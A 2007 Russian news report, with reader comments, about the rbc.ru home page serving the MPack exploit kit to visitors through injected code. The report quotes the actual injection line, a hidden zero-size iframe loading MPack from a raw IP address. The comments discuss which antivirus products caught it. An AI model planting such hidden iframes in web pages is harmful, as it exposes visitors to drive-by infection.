Сайт Rbc.ru распространял опасный троян

image

Сегодня утром многие пользователи, зашедшие на сайт rbc.ru увидели предупреждение антивируса о попытке заражения троянской программой.

Сегодня утром многие пользователи, зашедшие на сайт rbc.ru увидели предупреждение антивируса о попытке заражения троянской программой.

При детальном анализе оказалось, что на главной странице сайта содержался код

<iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0></iframe> ,

загружающий на компьютер пользователя программу Mpack, которая используется для загрузки вредоносного ПО на удаленные компьютеры за счет эксплуатации многочисленных уязвимостей.
За небольшой промежуток времени, пока висел троян, риску заражения подверглись несколько десятков тысяч пользователей сайта.


или введите имя

CAPTCHA
Страницы: 1  2  3  
07-06-2007 21:56:18
Хех интересно, что сообщается о взломе? Явно тут пахнет не одним РБК...
0 |
1
07-06-2007 22:32:30
Бугога)))) "Детальный анализ" - сурсы html посмотрели))))))))))
0 |
1
07-06-2007 23:34:53
+1
0 |
1
07-06-2007 22:50:08
нда, как-то странно - сайт поимели, а закриптовать сплойт не смогли (судя по статье). Если бы он не палился, то тогда бы точно несколько десятков тысяч пользователей схватили бы троя.
0 |
1
07-06-2007 23:44:39
Все очень просто, сам трой Mpack продается уже в закриптованном виде. Да и нельзя недооценивать антивирусные компании. Кстати Mpack на rbc ловил только касперский. Все хваленные антивирусы типа nod или dr. Web его не видели.
0 |
1
08-06-2007 01:14:50
Не только... McAfee тоже ловил.
0 |
1
08-06-2007 11:16:00
Как показала прктика последнего месяца мой любимый dr.Web перестал ловить мышей, а жаль! (
0 |
08-06-2007 15:54:35
А кто сказал, что Non - хваленый? Они уже давно забросили базы нормально вести, даже неоднократно присланных им троянов годовой давности не ловят... Так что этот продукт уже отмирает...
0 |
1
08-06-2007 18:11:52
согласен
0 |
1
08-06-2007 02:50:51
Точно такая же тема "повесилась" на urod.ru пару месяцев назад Тогда ее не ловил НИКТО - спас положение НОРМАЛЬНЫЙ фаерволл (о бесполезности которых так твердит Микрософт на первой странице)- зараза полезла в Инет и KIS тутже заверещал. Вируса отловили и отправили Касперскому - через день сигнатура была в обновлении.
0 |
1
08-06-2007 06:33:30
через день сигнатура была в обновленииОго! Очень оперативно ))
0 |
1
08-06-2007 11:01:00
вообще-то "оперативно" это 2-3 часа хотя, в данном случае касперу все-равно респект
0 |
1
08-06-2007 09:36:38
MPack - вообщето не троян и не программа, а связка сплойтов ...
0 |
Страницы: 1  2  3